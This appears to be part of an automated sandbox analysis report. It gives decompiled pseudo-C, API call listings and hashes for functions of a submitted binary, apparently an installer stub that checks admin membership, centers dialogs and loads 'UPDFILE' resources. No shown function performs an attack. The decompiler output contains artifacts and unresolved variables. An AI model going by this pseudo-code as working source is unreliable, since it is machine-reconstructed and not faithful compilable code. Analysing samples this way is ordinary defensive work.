                                                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(00A618DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A618DD), ref: 00A61855
                                                                                                                                                                                                      • FreeSid.ADVAPI32(?,?,?,?,00A618DD), ref: 00A61883
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00A618DD), ref: 00A6188A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                      • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                      • API String ID: 4204503880-1888249752
                                                                                                                                                                                                      • Opcode ID: 61d5eb7996d472bc0978a9443ba8c2569ec3c66a226e2a02ecd3c8bb13a306b6
                                                                                                                                                                                                      • Instruction ID: 6474d3b6efbf7854a8a1086674b8f5f54f2147933eb73f62b57ff5f8dab534a2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 61d5eb7996d472bc0978a9443ba8c2569ec3c66a226e2a02ecd3c8bb13a306b6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71116071E00209ABDB10DFE4DC49ABEBBB8EF48701F150569FA16E3290DA709D058B91
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A63450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                      				void* _t7;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				struct HWND__* _t12;
                                                                                                                                                                                                      				int _t22;
                                                                                                                                                                                                      				struct HWND__* _t24;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t7 = _a8 - 0x10;
                                                                                                                                                                                                      				if(_t7 == 0) {
                                                                                                                                                                                                      					EndDialog(_a4, 2);
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t11 = _t7 - 0x100;
                                                                                                                                                                                                      				if(_t11 == 0) {
                                                                                                                                                                                                      					_t12 = GetDesktopWindow();
                                                                                                                                                                                                      					_t24 = _a4;
                                                                                                                                                                                                      					E00A643D0(_t24, _t12);
                                                                                                                                                                                                      					SetWindowTextA(_t24, "cent");
                                                                                                                                                                                                      					SetDlgItemTextA(_t24, 0x838,  *0xa69404);
                                                                                                                                                                                                      					SetForegroundWindow(_t24);
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t11 == 1) {
                                                                                                                                                                                                      					_t22 = _a12;
                                                                                                                                                                                                      					if(_t22 < 6) {
                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t22 <= 7) {
                                                                                                                                                                                                      						L8:
                                                                                                                                                                                                      						EndDialog(_a4, _t22);
                                                                                                                                                                                                      						return 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t22 != 0x839) {
                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *0xa691dc = 1;
                                                                                                                                                                                                      					goto L8;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}









                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 00A63490
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00A6349A
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 00A634B2
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,00000838), ref: 00A634C4
                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 00A634CB
                                                                                                                                                                                                      • EndDialog.USER32(?,00000002), ref: 00A634D8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                      • String ID: cent
                                                                                                                                                                                                      • API String ID: 852535152-3940384054
                                                                                                                                                                                                      • Opcode ID: be39802b8c3547158c87b17f22d67a2f1cc0b041d8d79213f258ebfb534d54b8
                                                                                                                                                                                                      • Instruction ID: 1c1610c8a95fec94d6caeda6fa235e38048637ab2ffe230b2cf1aecab8ac3741
                                                                                                                                                                                                      • Opcode Fuzzy Hash: be39802b8c3547158c87b17f22d67a2f1cc0b041d8d79213f258ebfb534d54b8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7001B132240114ABDF169FA5DC0C96EBB74EF1A702F104110FA47965A0CFB09F53CB85
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                      			E00A62AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t16;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				char _t32;
                                                                                                                                                                                                      				intOrPtr _t34;
                                                                                                                                                                                                      				char* _t38;
                                                                                                                                                                                                      				char _t42;
                                                                                                                                                                                                      				char* _t44;
                                                                                                                                                                                                      				CHAR* _t52;
                                                                                                                                                                                                      				intOrPtr* _t55;
                                                                                                                                                                                                      				CHAR* _t59;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				CHAR* _t64;
                                                                                                                                                                                                      				CHAR* _t65;
                                                                                                                                                                                                      				signed int _t66;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t60 = __edx;
                                                                                                                                                                                                      				_t16 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                      				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                      				_t65 = _a4;
                                                                                                                                                                                                      				_t44 = __edx;
                                                                                                                                                                                                      				_t64 = __ecx;
                                                                                                                                                                                                      				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                      					GetModuleFileNameA( *0xa69a3c,  &_v268, 0x104);
                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                      						_t17 =  *_t64;
                                                                                                                                                                                                      						if(_t17 == 0) {
                                                                                                                                                                                                      							break;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                      						 *_t65 =  *_t64;
                                                                                                                                                                                                      						if(_t21 != 0) {
                                                                                                                                                                                                      							_t65[1] = _t64[1];
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if( *_t64 != 0x23) {
                                                                                                                                                                                                      							L19:
                                                                                                                                                                                                      							_t65 = CharNextA(_t65);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t64 = CharNextA(_t64);
                                                                                                                                                                                                      							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                      								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                      									if( *_t64 == 0x23) {
                                                                                                                                                                                                      										goto L19;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E00A61680(_t65, E00A617C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                      									_t52 = _t65;
                                                                                                                                                                                                      									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                      									_t60 = _t14;
                                                                                                                                                                                                      									do {
                                                                                                                                                                                                      										_t32 =  *_t52;
                                                                                                                                                                                                      										_t52 =  &(_t52[1]);
                                                                                                                                                                                                      									} while (_t32 != 0);
                                                                                                                                                                                                      									goto L17;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								E00A665E8( &_v268);
                                                                                                                                                                                                      								_t55 =  &_v268;
                                                                                                                                                                                                      								_t62 = _t55 + 1;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t34 =  *_t55;
                                                                                                                                                                                                      									_t55 = _t55 + 1;
                                                                                                                                                                                                      								} while (_t34 != 0);
                                                                                                                                                                                                      								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                      								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                      									 *_t38 = 0;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								E00A61680(_t65, E00A617C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                      								_t59 = _t65;
                                                                                                                                                                                                      								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                      								_t60 = _t12;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t42 =  *_t59;
                                                                                                                                                                                                      									_t59 =  &(_t59[1]);
                                                                                                                                                                                                      								} while (_t42 != 0);
                                                                                                                                                                                                      								L17:
                                                                                                                                                                                                      								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t64 = CharNextA(_t64);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *_t65 = _t17;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00A66CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                      			}






















                                                                                                                                                                                                      0x00a62bf8

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00A62AE6
                                                                                                                                                                                                      • IsDBCSLeadByte.KERNEL32(00000000), ref: 00A62AF2
                                                                                                                                                                                                      • CharNextA.USER32(?), ref: 00A62B12
                                                                                                                                                                                                      • CharUpperA.USER32 ref: 00A62B1E
                                                                                                                                                                                                      • CharPrevA.USER32(?,?), ref: 00A62B55
                                                                                                                                                                                                      • CharNextA.USER32(?), ref: 00A62BD4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 571164536-0
                                                                                                                                                                                                      • Opcode ID: 8ef88c65b844a6a59b55f938a501a4cc21bea40c3c94048c1b827717d7c05dbc
                                                                                                                                                                                                      • Instruction ID: 58ff84b66f462eba5127311e926b724b0bed7d8de8c90450a34a8d76636f25a8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ef88c65b844a6a59b55f938a501a4cc21bea40c3c94048c1b827717d7c05dbc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F04112346086455EDB159F348C14BFD7FB9DF62300F08419AE8C297202DBB58E87CB61
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                      			E00A643D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				struct tagRECT _v24;
                                                                                                                                                                                                      				struct tagRECT _v40;
                                                                                                                                                                                                      				struct HWND__* _v44;
                                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                                      				int _v52;
                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                      				int _v60;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t29;
                                                                                                                                                                                                      				void* _t53;
                                                                                                                                                                                                      				intOrPtr _t56;
                                                                                                                                                                                                      				int _t59;
                                                                                                                                                                                                      				struct HWND__* _t63;
                                                                                                                                                                                                      				struct HWND__* _t67;
                                                                                                                                                                                                      				struct HWND__* _t68;
                                                                                                                                                                                                      				struct HDC__* _t69;
                                                                                                                                                                                                      				int _t72;
                                                                                                                                                                                                      				signed int _t74;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t63 = __edx;
                                                                                                                                                                                                      				_t29 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                      				_t68 = __edx;
                                                                                                                                                                                                      				_v44 = __ecx;
                                                                                                                                                                                                      				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                      				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                      				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                      				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                      				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                      				_t69 = GetDC(_v44);
                                                                                                                                                                                                      				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                      				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                      				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                      				_t56 = _v48;
                                                                                                                                                                                                      				asm("cdq");
                                                                                                                                                                                                      				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                      				_t67 = 0;
                                                                                                                                                                                                      				if(_t72 >= 0) {
                                                                                                                                                                                                      					_t63 = _v52;
                                                                                                                                                                                                      					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                      						_t72 = _t63 - _t56;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t72 = _t67;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				asm("cdq");
                                                                                                                                                                                                      				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                      				if(_t59 >= 0) {
                                                                                                                                                                                                      					_t63 = _v60;
                                                                                                                                                                                                      					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                      						_t59 = _t63 - _t53;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t59 = _t67;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00A66CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                      			}

























                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00A643F1
                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00A6440B
                                                                                                                                                                                                      • GetDC.USER32(?), ref: 00A64423
                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00A6442E
                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00A6443A
                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00A64447
                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00A644A2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2212493051-0
                                                                                                                                                                                                      • Opcode ID: 173465f145bd08604f9bceda1eb39473197da2ac3e02b6c5612d97dd68d91f7d
                                                                                                                                                                                                      • Instruction ID: d29873db8ddb0c4fd71ff18125fe6ef4ab6a66798755ada87624de14dc3ac41a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 173465f145bd08604f9bceda1eb39473197da2ac3e02b6c5612d97dd68d91f7d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B0312B72E00119AFCB14CFF8DD899EEBBB5EB89310F154269F905B3250DA74AD058B60
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 53%
                                                                                                                                                                                                      			E00A66298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v28;
                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                      				struct HINSTANCE__* _v36;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t16;
                                                                                                                                                                                                      				struct HRSRC__* _t21;
                                                                                                                                                                                                      				intOrPtr _t26;
                                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                      				intOrPtr* _t40;
                                                                                                                                                                                                      				void* _t41;
                                                                                                                                                                                                      				intOrPtr* _t44;
                                                                                                                                                                                                      				intOrPtr* _t45;
                                                                                                                                                                                                      				void* _t47;
                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                      				struct HINSTANCE__* _t51;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t44 = __edx;
                                                                                                                                                                                                      				_t16 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                      				_t46 = 0;
                                                                                                                                                                                                      				_v32 = __ecx;
                                                                                                                                                                                                      				_v36 = 0;
                                                                                                                                                                                                      				_t36 = 1;
                                                                                                                                                                                                      				E00A6171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					_t51 = _t51 + 0x10;
                                                                                                                                                                                                      					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                      					if(_t21 == 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                      					if(_t45 == 0) {
                                                                                                                                                                                                      						 *0xa69124 = 0x80070714;
                                                                                                                                                                                                      						_t36 = _t46;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                      						_t44 = _t5;
                                                                                                                                                                                                      						_t40 = _t44;
                                                                                                                                                                                                      						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                      						_t47 = _t6;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t26 =  *_t40;
                                                                                                                                                                                                      							_t40 = _t40 + 1;
                                                                                                                                                                                                      						} while (_t26 != 0);
                                                                                                                                                                                                      						_t41 = _t40 - _t47;
                                                                                                                                                                                                      						_t46 = _t51;
                                                                                                                                                                                                      						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                      						 *0xa6a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                      						_t30 = _v32();
                                                                                                                                                                                                      						if(_t51 != _t51) {
                                                                                                                                                                                                      							asm("int 0x29");
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_push(_t45);
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							_t36 = 0;
                                                                                                                                                                                                      							FreeResource(??);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							FreeResource();
                                                                                                                                                                                                      							_v36 = _v36 + 1;
                                                                                                                                                                                                      							E00A6171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                      							_t46 = 0;
                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					return E00A66CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L12;
                                                                                                                                                                                                      			}























                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00A6171E: _vsnprintf.MSVCRT ref: 00A61750
                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00A651CA,00000004,00000024,00A62F71,?,00000002,00000000), ref: 00A662CD
                                                                                                                                                                                                      • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A651CA,00000004,00000024,00A62F71,?,00000002,00000000), ref: 00A662D4
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A651CA,00000004,00000024,00A62F71,?,00000002,00000000), ref: 00A6631B
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00A66345
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A651CA,00000004,00000024,00A62F71,?,00000002,00000000), ref: 00A66357
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                      • String ID: UPDFILE%lu
                                                                                                                                                                                                      • API String ID: 2922116661-2329316264
                                                                                                                                                                                                      • Opcode ID: 19c59aee9a1ff74ca2e737a1e18a51d5ff60279d0dfcb5e9cfc0a85978ea4635
                                                                                                                                                                                                      • Instruction ID: 9bcfd931c23e7bbac2e0e04a4fa626a837ce825271254023d25e63f4bdfd0b70
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19c59aee9a1ff74ca2e737a1e18a51d5ff60279d0dfcb5e9cfc0a85978ea4635
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C210271A00219ABDB10DFA4DC499FFBB7CFF49710B040229FA02A7241DB759D068BE0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E00A6681F(void* __ebx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                                      				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                      				void* _v172;
                                                                                                                                                                                                      				int* _v176;
                                                                                                                                                                                                      				int _v180;
                                                                                                                                                                                                      				int _v184;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                                      				long _t31;
                                                                                                                                                                                                      				signed int _t35;
                                                                                                                                                                                                      				void* _t36;
                                                                                                                                                                                                      				intOrPtr _t41;
                                                                                                                                                                                                      				signed int _t44;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t36 = __ebx;
                                                                                                                                                                                                      				_t19 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                      				_t41 =  *0xa681d8; // 0xfffffffe
                                                                                                                                                                                                      				_t43 = 0;
                                                                                                                                                                                                      				_v180 = 0xc;
                                                                                                                                                                                                      				_v176 = 0;
                                                                                                                                                                                                      				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                      					 *0xa681d8 = 0;
                                                                                                                                                                                                      					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                      					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                      						L12:
                                                                                                                                                                                                      						_t41 =  *0xa681d8; // 0xfffffffe
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t41 = 1;
                                                                                                                                                                                                      						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                      							goto L12;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t31 = RegQueryValueExA(_v172, 0xa61140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                      							_t43 = _t31;
                                                                                                                                                                                                      							RegCloseKey(_v172);
                                                                                                                                                                                                      							if(_t31 != 0) {
                                                                                                                                                                                                      								goto L12;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t40 =  &_v176;
                                                                                                                                                                                                      								if(E00A666F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                      									goto L12;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                      									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                      										 *0xa681d8 = _t41;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										goto L12;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00A66CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A6686E
                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000004A), ref: 00A668A7
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A668CC
                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,00A61140,00000000,?,?,0000000C), ref: 00A668F4
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00A66902
                                                                                                                                                                                                        • Part of subcall function 00A666F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00A6691A), ref: 00A66741
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Control Panel\Desktop\ResourceLocale, xrefs: 00A668C2
                                                                                                                                                                                                      Memory Dump Source
